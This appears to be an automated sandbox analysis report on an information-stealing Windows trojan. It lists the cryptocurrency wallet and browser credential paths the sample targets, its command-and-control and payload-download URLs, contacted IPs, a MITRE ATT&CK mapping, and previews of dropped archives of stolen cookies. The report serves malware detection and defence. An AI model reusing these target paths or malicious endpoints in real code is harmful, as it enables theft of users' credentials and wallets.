Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	String found in binary or memory: .%USERPROFILE%\Desktop\.txt%USERPROFILE%wallet.datUTC--2%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.485801496.000000000503F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.268846531.0000000005030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486053378.0000000005129000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486682219.00000000054D1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Male.exe.com PID: 6844, type: MEMORY
Source: Yara match	File source: 10.2.Male.exe.com.54d0000.7.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Glupteba

Show sources

Source: Yara match	File source: 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Male.exe.com PID: 6844, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Scheduled Task/Job1	Exploitation for Privilege Escalation1	Deobfuscate/Decode Files or Information11	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Process Injection12	Obfuscated Files or Information2	Input Capture111	File and Directory Discovery3	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Scheduled Task/Job1	Masquerading1	Security Account Manager	System Information Discovery45	SMB/Windows Admin Shares	Input Capture111	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion2	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection12	LSA Secrets	Security Software Discovery21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Virtualization/Sandbox Evasion2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Process Discovery11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
32_64_ver_2_bit.exe	19%	Virustotal		Browse
32_64_ver_2_bit.exe	17%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.1.32_64_ver_2_bit.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
esmxc01.top	2%	Virustotal		Browse
mardxd01.top	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://esmxc01.top/download.php?file=lv.exer	0%	Avira URL Cloud	safe
http://esmxc01.top/download.php?file=lv.exemA	0%	Avira URL Cloud	safe
http://dyhkw15.top/index.phpu	100%	Avira URL Cloud	malware
http://esmxc01.top/download.php?file=lv.exe	0%	Avira URL Cloud	safe
http://www.avast.com0/	0%	Avira URL Cloud	safe
http://dyhkw15.top/index.phpO	100%	Avira URL Cloud	malware
http://esmxc01.top/download.php?file=lv.exeltipart/x-byteranges	0%	Avira URL Cloud	safe
http://www.avast.com0	0%	Avira URL Cloud	safe
http://mardxd01.top/index.php	100%	Avira URL Cloud	malware
http://dyhkw15.top/index.php	100%	Avira URL Cloud	malware
http://esmxc01.top/download.php?file=lv.exeF	0%	Avira URL Cloud	safe
http://esmxc01.top/download.php?file=lv.exeopenBOOLEANBIT	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dyhkw15.top	34.118.72.185	true	false		unknown
esmxc01.top	34.65.214.4	true	false	2%, Virustotal, Browse	unknown
mardxd01.top	8.209.67.151	true	false	0%, Virustotal, Browse	unknown
cTUOwSlyoPnUr.cTUOwSlyoPnUr	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://esmxc01.top/download.php?file=lv.exe	false	Avira URL Cloud: safe	unknown
http://mardxd01.top/index.php	true	Avira URL Cloud: malware	unknown
http://dyhkw15.top/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	cMgIojVP.tmp.10.dr	false		high
https://duckduckgo.com/chrome_newtab	cMgIojVP.tmp.10.dr	false		high
https://duckduckgo.com/ac/?q=	cMgIojVP.tmp.10.dr	false		high
http://esmxc01.top/download.php?file=lv.exer	Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://esmxc01.top/download.php?file=lv.exemA	Male.exe.com, 0000000A.00000002.484370061.000000000402C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://dyhkw15.top/index.phpu	Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cMgIojVP.tmp.10.dr	false		high
http://www.autoitscript.com/autoit3/X	Male.exe.com, 00000008.00000000.206992204.0000000001485000.00000002.00020000.sdmp, Male.exe.com, 0000000A.00000002.482415694.0000000001485000.00000002.00020000.sdmp, Male.exe.com.7.dr	false		high
http://www.avast.com0/	32_64_ver_2_bit.exe	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	cMgIojVP.tmp.10.dr	false		high
http://dyhkw15.top/index.phpO	Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://www.autoitscript.com/autoit3/	Male.exe.com.7.dr	false		high
http://esmxc01.top/download.php?file=lv.exeltipart/x-byteranges	Male.exe.com, 0000000A.00000002.484428022.0000000004044000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.avast.com0	32_64_ver_2_bit.exe	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cMgIojVP.tmp.10.dr	false		high
http://esmxc01.top/download.php?file=lv.exeF	Male.exe.com, 0000000A.00000002.484370061.000000000402C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://esmxc01.top/download.php?file=lv.exeopenBOOLEANBIT	Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cMgIojVP.tmp.10.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
8.209.67.151	mardxd01.top	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
34.118.72.185	dyhkw15.top	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
34.65.214.4	esmxc01.top	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	382683
Start date:	06.04.2021
Start time:	13:56:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	32_64_ver_2_bit.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/24@4/5
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 53.6% (good quality ratio 50.9%) Quality average: 85.8% Quality standard deviation: 25%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 131.253.33.200, 13.107.22.200, 104.42.151.234, 52.255.188.83, 40.88.32.150, 184.30.20.56, 20.190.160.136, 20.190.160.132, 20.190.160.75, 20.190.160.134, 20.190.160.8, 20.190.160.73, 20.190.160.4, 20.190.160.129, 20.82.209.183, 92.122.213.194, 92.122.213.247, 20.54.26.129, 52.155.217.156, 20.190.160.71, 20.190.160.6, 20.190.160.67, 51.104.136.2, 40.127.240.158, 20.49.150.241, 51.11.168.232 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Execution Graph export aborted for target Male.exe.com, PID 6844 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:57:44	API Interceptor	2x Sleep call for process: Male.exe.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
8.209.67.151	L87N50MbDG.exe	Get hash	malicious	Browse
34.65.214.4	L87N50MbDG.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	L87N50MbDG.exe	Get hash	malicious	Browse	34.65.214.4
	S38QJsVk0U.exe	Get hash	malicious	Browse	34.65.111.75
	7s8sxzCJlN.exe	Get hash	malicious	Browse	34.65.111.75
	6iHJeLsLbl.exe	Get hash	malicious	Browse	34.65.191.195
	IaYA2iuuIV.exe	Get hash	malicious	Browse	34.65.191.195
	Ypp2jYNpAI.exe	Get hash	malicious	Browse	34.65.191.195
	ssmeyam.dll	Get hash	malicious	Browse	34.65.12.31
	SecuriteInfo.com.Trojan.PWS.Siggen2.63733.4520.exe	Get hash	malicious	Browse	34.65.191.195
	PO-108561.exe	Get hash	malicious	Browse	34.66.135.39
	document-230168642.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-444005144.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-485605845.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-485605845.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1042640721.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1042640721.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-955293706.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1997483493.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-955293706.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1997483493.xlsm	Get hash	malicious	Browse	34.65.218.17
	subscription_1616436904.xls	Get hash	malicious	Browse	34.65.38.228
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	1234.xlsm	Get hash	malicious	Browse	8.211.4.209
	12345.xlsm	Get hash	malicious	Browse	8.211.4.209
	1234.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-748443571.xlsm	Get hash	malicious	Browse	8.211.4.209
	12345.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1887159634.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-748443571.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1887159634.xlsm	Get hash	malicious	Browse	8.211.4.209
	L87N50MbDG.exe	Get hash	malicious	Browse	8.209.67.151
	documents-683917632.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-683917632.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1760163871.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1760163871.xlsm	Get hash	malicious	Browse	8.211.4.209
	Proforma invoice.doc	Get hash	malicious	Browse	47.244.190.114
	yPkfbflyoh.exe	Get hash	malicious	Browse	8.208.95.18
	4CwmE1pYh5.exe	Get hash	malicious	Browse	47.91.72.80
	com.multicamera.coolwending.translator.apk	Get hash	malicious	Browse	47.253.30.230
	JYDy1dAHdW.exe	Get hash	malicious	Browse	8.208.95.18
	EppTbowa74.exe	Get hash	malicious	Browse	8.208.95.18
	tcNbszVulx.exe	Get hash	malicious	Browse	8.208.95.18
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	L87N50MbDG.exe	Get hash	malicious	Browse	34.65.214.4
	S38QJsVk0U.exe	Get hash	malicious	Browse	34.65.111.75
	7s8sxzCJlN.exe	Get hash	malicious	Browse	34.65.111.75
	6iHJeLsLbl.exe	Get hash	malicious	Browse	34.65.191.195
	IaYA2iuuIV.exe	Get hash	malicious	Browse	34.65.191.195
	Ypp2jYNpAI.exe	Get hash	malicious	Browse	34.65.191.195
	ssmeyam.dll	Get hash	malicious	Browse	34.65.12.31
	SecuriteInfo.com.Trojan.PWS.Siggen2.63733.4520.exe	Get hash	malicious	Browse	34.65.191.195
	PO-108561.exe	Get hash	malicious	Browse	34.66.135.39
	document-230168642.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-444005144.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-485605845.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-485605845.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1042640721.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1042640721.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-955293706.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1997483493.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-955293706.xlsm	Get hash	malicious	Browse	34.65.218.17
	document-1997483493.xlsm	Get hash	malicious	Browse	34.65.218.17
	subscription_1616436904.xls	Get hash	malicious	Browse	34.65.38.228

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\RYyYId.txt Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.849985478918108
Encrypted:	false
SSDEEP:	3:jBJXvO3YEu71/Ak:jBJ/O3Yuk
MD5:	9458A2627B3DDB232A76C8C8381C71AD
SHA1:	96573A2BB467933171D792669D0F6FFF49E43389
SHA-256:	43BD6B14ED369EF6D22720EC30BDE812A954E3DDFAAE4CF78A5076D0E8269379
SHA-512:	E321BEB84C54986BC1739D4870E4039FB8571EC0ECE01BE6BCF7F23DC48D02E873FC44170BD866B94C6F975CEC9F7E6A87220C4B0BED7D0C38FDBA2406C378E2
Malicious:	false
Reputation:	low
Preview:	Windows 10 Pro..user..Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..

C:\Users\user\AppData\Local\Temp\sldDCZXdq\EoHYfMVIhubMt.zip Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	67395
Entropy (8bit):	7.996226084278647
Encrypted:	true
SSDEEP:	1536:peywR6FOnTMy7KQbcbQzHBv7boDft5gFalf2au5gNhpvWL08Wc1:pwR6keyHBv7itXXPNhpvWwbc1
MD5:	52EE68C5CD8A31C79BF12B20D77A06C8
SHA1:	4F1C3F7FD30FE0FE55714B3ED76F726B671BE470
SHA-256:	DFB118FC7E8DC219407F40F795FC3B7B97E58DE3CE9A4917187D18692F32355B
SHA-512:	D66F05DE924FA756DA2773735B3E2040EB8866180AAB36D2A3BE7C171465F7F747F7E001DAC824FE6C33E219812F6D7403AB8DC27934531DDC2E657E1DEC7B95
Malicious:	false
Preview:	PK........@..R................_AllCookies_list.txtUT.....l`..l`..l`/.`0....d..v.......z...M<0.H4(..MH.......S.n....#.Iwl..K.R.......S/_.,....g...j.i....'..aJfkUp..Tf.?.f..$.(.8..`......Vza.s[..r;...I......g.u...a..Vn..3..E...D...ol.1.r.........+%.7q...#...k...0..PK..[L..........PK........@..R................_Cookies/google_chrome_new.txtUT.....l`..l`..l`......W...&._j.w..+..z<.f..@./,X.^$"....I!?[................s.]....".w>.4_...r.f..'.....<.....o..7.v.\|m..7P&\|Q..K...J.....1=.#.g`H..SK.C.9..3...J.-md.q ...^..TcI....\..........o.....~.AS.mI.S.,UP...PK..[L..........PK........B..R.........O......_Information.txtUT.....l`..l`..l`......W...&^.>...4,L9)..F."..b.....#.z..a..i.o.Z.H.Y.f.U.b....9:d.q.........S.?..Ch.n>..w..I.R....Dy...I....#...<...iFMR.....M..^q./3.).....*.h5..?..q._..).S..}...@.... ....s96.>..DM....}P.....}6.....\......2...r+@I..=..4@U......).N.~..m.g.H;&..[.n.H..ia.a.(?.t....W.4d.+......T..v\|.S.^.B..V....oR...u...\.\|h.........gM].T..

C:\Users\user\AppData\Local\Temp\sldDCZXdq\VXUytI.tmp Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sldDCZXdq\VXlKMMGjUnv.zip Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	67376
Entropy (8bit):	7.996419700776214
Encrypted:	true
SSDEEP:	1536:gG+GiK+pk4hnZi8WZHQMHGreWDwVcOF1oefSjGn+HJsVBYiMSeoMq:g9Y2kMU8WZrGrDDw2C1B+oBClq
MD5:	50843C8E2F90573DDB243EEBA6AA0063
SHA1:	07F056D6E85EA95C56B4E3DC8CC2949AAA85E03E
SHA-256:	5955B11184DA0A91DB9534A9118FB7A62DC3F0DC0EF03700329AC108077901CB
SHA-512:	7702F3D9970FCC6CF224E4A0A8D187E210BB0102744A1D1A910664127CBCA4EDBC2FF3CC7276B2CBAE44AAA2A0C1C44230D4A2AC8259BE01A380E55687A01943
Malicious:	false
Preview:	PK........@..R................cookies/google_chrome_new.txtUT.....l`..l`..l`..^....`.N{...i...r<....YH....mR..........s...S..YFy..~.........../7..LZ..?..)Q.).@ap...p.>.W.......^.o....$..I8.5RrT..Oj.8..._qj......c.C....a...........7a.1..cX.i.....u'....E .....Ac{...y......PK..N.m7........PK........@..R................cookies.txtUT.....l`..l`..l`..^....`.N{...i...r<....YH....mR..........s...S..YFy..~.........../7..LZ..?..)Q.).@ap...p.>.W.......^.o....$..I8.5RrT..Oj.8..._qj......c.C....a...........7a.1..cX.i.....u'....E .....Ac{...y......PK..N.m7........PK........@..R................screenshot.jpgUT.....l`..l`..l`.iF..n...t.?L..m...L...N..............?..j...(P..t...G.wu.P.....co.m.9..e=..'./V..@B....:.}M6.\|_..."..{..#zL..\.......JW....Q..2........h......8c.}C.3..."'*..g..U.6.:.....#.$U...I.F....g..Rn....c.=."....j8d..V?k.....Z~-yK..;.\|..U...-...j.HE$....P^.......l......^...2..q.. }..>..2"~.^....dyT...pv\.H...,=..?,.+(GSx...9.Pg...e9.].C........]

C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_AllCookies_list.txt Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.781201565153871
Encrypted:	false
SSDEEP:	6:Pk3rYVUxLHo3HWvmWogYmmYIkV0NAXhtfx:c7YVU9kYLmWV0Ghtp
MD5:	EC40B12DDE31F7344CF608AFAF57017C
SHA1:	FC5C0C6D989520C128B23B11A3495CD65EB83EAC
SHA-256:	F254BFF1B503777831EC3395E3426C7DE49084E700C4F125E8D5B670979E9F5C
SHA-512:	10ED9095D00EB267654D510037A7C2B3CFA214D33BE9932DBEE7F1698BF36CA5A38C929A459A14E485752D35939E8934E7FFA4E7354FB511ECD0305F49A5AD49
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.1830365600.NID.204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34..

C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_Cookies\google_chrome_new.txt Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.781201565153871
Encrypted:	false
SSDEEP:	6:Pk3rYVUxLHo3HWvmWogYmmYIkV0NAXhtfx:c7YVU9kYLmWV0Ghtp
MD5:	EC40B12DDE31F7344CF608AFAF57017C
SHA1:	FC5C0C6D989520C128B23B11A3495CD65EB83EAC
SHA-256:	F254BFF1B503777831EC3395E3426C7DE49084E700C4F125E8D5B670979E9F5C
SHA-512:	10ED9095D00EB267654D510037A7C2B3CFA214D33BE9932DBEE7F1698BF36CA5A38C929A459A14E485752D35939E8934E7FFA4E7354FB511ECD0305F49A5AD49
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.1830365600.NID.204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34..

C:\Users\user\AppData\Local\Temp\sldDCZXdq\_Files\_Information.txt Download File
Process:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	20440
Entropy (8bit):	3.5246782009096096
Encrypted:	false
